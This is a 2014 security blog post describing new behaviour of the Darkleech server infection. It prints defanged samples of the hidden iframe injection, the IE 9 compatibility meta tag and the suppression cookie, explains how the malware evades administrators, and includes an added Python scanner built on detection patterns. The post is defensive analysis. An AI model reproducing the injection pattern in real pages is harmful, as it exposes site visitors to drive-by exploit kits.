Darkleech Update – November 2014

Just wanted to document some latest changes in Darkleech behavior that may help you detect it.

I’d like to thank internet security enthusiasts who share their findings with me. Without you, I could have easily missed these new (?) details.

Quick recap

Darkleech is a root-level server infection that installs malicious Apache modules. The modules inject invisible iframes into the server response after it has already been prepared (linebreaks added for readability).

<style>.a4on6mz5h { position:absolute; left:-1376px; top:-1819px} </style> <div class="a4on6mz5h">
<ifr ame src="hxxp://tfmjst .hopto .org/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2" width="247" height="557"></ifram e></div>

All the elements of this code are random and auto-generated on the fly (style name, coordinates, iframe dimensions, URL paths). Moreover, the iframe domains change every few minutes — lately hackers prefer free No-IP.com dynamic DNS hostnames like hopto.org, ddns.net, myftp.biz, myftp.org, serveftp.com, servepics.com, etc.

This infection is hard to detect as it only shows up once per IP per day (or possibly even less often). And since it works at a low system level, it can detect whether server admins are logged in, so it lurks until they log out — this means that they won’t see anything even if they monitor outgoing TCP traffic.

For more details, please check the links at the bottom of this post.

What’s new?


Recently it was pointed out to me that Darkleech now also adds the following meta tag, which turns on IE 9 compatibility mode in Internet Explorer. It looks like it searches for the </head> tag and replaces it with the following code (again, linebreaks added for readability):

<meta http-equiv='x-ua-compatible' content='IE=EmulateIE9'></head>
<style>.syxq9la69 { position:absolute; left:-1666px; top:-1634px} </style> <div class="syxq9la69">
<iframe src="hxxp://jsnrgo .ddns .net/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2" width="285" height="554"></iframe></div>

This IE=EmulateIE9 instruction tells modern versions of Internet Explorer to render a web page as if they were IE 9, using all the features that have been deprecated in IE 10 and newer versions of IE. Some of the legacy features are known to have vulnerabilities, and hackers try to exploit them by turning the compatibility mode on (e.g. the VML-related exploit).

_SESSION_ID cookie

In addition to temporary IP blacklisting, Darkleech also uses the _SESSION_ID cookie that expires in one week. It adds the following cookie into response headers:

Set-Cookie: _SESSION_ID=-1; expires=Wed 03-Dec-2014 09:32:48 GMT; path=/

So even if you change your IP address (e.g. if you have a dynamic IP address) you still won’t see the malware for the following 7 days. So don’t forget to clear/block cookies if you are trying to reproduce the infected response.

Most likely the IP blacklisting now lasts one week as well.

Just a couple more things:

  • As you might have figured out, it looks for Internet Explorer User-Agent (and derivatives like Maxthon, Avant).
  • Referer is not important at the moment. I managed to trigger it even without the Referer header.
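To turn the indicators above (off-screen absolutely positioned style with a random class name, a hidden div wrapping an iframe that points at a free dynamic DNS host, the IE=EmulateIE9 meta tag, and the _SESSION_ID=-1 cookie) into something you can run over a captured response, here is a small added example. It is my own illustration, not code from the original post or from any tool mentioned in it. The sample response is constructed (the hostname and path are placeholders, not the defanged values from the post), and the threshold of "more than 500px off-screen" is my own assumption, not a documented property of the module. Remember that, per the post, you only get the injected response once per IP per day, with an Internet Explorer User-Agent, and without the week-long cookie, so this scanner is for inspecting a response you already captured under those conditions.

```python
import re
from urllib.parse import urlsplit

# Constructed sample response (placeholder host and path), shaped like the
# injection described in the post. Not a real capture.
SAMPLE_HEADERS = {
    "Content-Type": "text/html",
    "Set-Cookie": "_SESSION_ID=-1; expires=Wed 03-Dec-2014 09:32:48 GMT; path=/",
}
SAMPLE_BODY = """<html><head><title>Site</title>
<meta http-equiv='x-ua-compatible' content='IE=EmulateIE9'></head>
<body><p>Hello</p>
<style>.syxq9la69 { position:absolute; left:-1666px; top:-1634px} </style> <div class="syxq9la69">
<iframe src="http://abcdef.ddns.net/placeholder-path" width="285" height="554"></iframe></div>
</body></html>"""

# Constructed clean page for comparison.
CLEAN_BODY = """<html><head><title>Site</title></head>
<body><p>Hello</p><iframe src="https://www.example.com/embed" width="300" height="150"></iframe></body></html>"""

# Free dynamic DNS suffixes named in the post.
DYNDNS_SUFFIXES = tuple(
    "." + s for s in ("hopto.org", "ddns.net", "myftp.biz", "myftp.org", "serveftp.com", "servepics.com")
)
OFFSCREEN_PX = 500  # assumption: anything pushed this far off-screen is hidden on purpose

STYLE_RE = re.compile(
    r"<style>\s*\.([A-Za-z0-9_-]+)\s*\{\s*position\s*:\s*absolute\s*;"
    r"\s*left\s*:\s*(-?\d+)px\s*;\s*top\s*:\s*(-?\d+)px\s*\}\s*</style>",
    re.I,
)
IFRAME_RE = re.compile(r'<iframe\s[^>]*src=["\']([^"\']+)["\']', re.I)
META_RE = re.compile(r"<meta\s+http-equiv=['\"]x-ua-compatible['\"]\s+content=['\"]IE=EmulateIE9['\"]", re.I)
COOKIE_RE = re.compile(r"_SESSION_ID=-1\b")


def scan_response(headers, body):
    """Return a list of (indicator, detail) tuples found in one HTTP response.

    headers: dict of header name -> value (a real client may deliver several
    Set-Cookie headers; join or iterate them before calling this).
    body: the response HTML as text.
    """
    findings = []

    # 1. Off-screen style whose class is used by a div wrapping an iframe.
    for m in STYLE_RE.finditer(body):
        cls, left, top = m.group(1), int(m.group(2)), int(m.group(3))
        if left < -OFFSCREEN_PX or top < -OFFSCREEN_PX:
            div = re.search(r'<div\s+class=["\']%s["\']\s*>(.*?)</div>' % re.escape(cls), body, re.I | re.S)
            if div:
                src = IFRAME_RE.search(div.group(1))
                findings.append(("hidden_iframe", src.group(1) if src else None))

    # 2. Any iframe whose host is on a free dynamic DNS service.
    for m in IFRAME_RE.finditer(body):
        host = (urlsplit(m.group(1)).hostname or "").lower()
        if host.endswith(DYNDNS_SUFFIXES):
            findings.append(("dyndns_iframe", host))

    # 3. Meta tag forcing IE 9 compatibility mode.
    if META_RE.search(body):
        findings.append(("ie9_compat_meta", "IE=EmulateIE9"))

    # 4. The week-long suppression cookie in the response headers.
    for name, value in headers.items():
        if name.lower() == "set-cookie" and COOKIE_RE.search(value):
            findings.append(("session_id_cookie", value.split(";")[0].strip()))

    return findings


if __name__ == "__main__":
    for kind, detail in scan_response(SAMPLE_HEADERS, SAMPLE_BODY):
        print(f"{kind}: {detail}")
    print("clean page:", scan_response({"Content-Type": "text/html"}, CLEAN_BODY))
```

Each indicator is reported separately on purpose: the cookie and the meta tag can be checked on every response from a server you own, while the hidden-iframe check is the one that needs the once-per-IP, IE User-Agent, no-cookie conditions the post describes, so in practice you would run the scanner from a fresh address and treat even one finding as worth a closer look at the Apache modules loaded on the host.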

That’s it for today. Please let me know if you have some other news about Darkleech.

Previous posts about Darkleech:

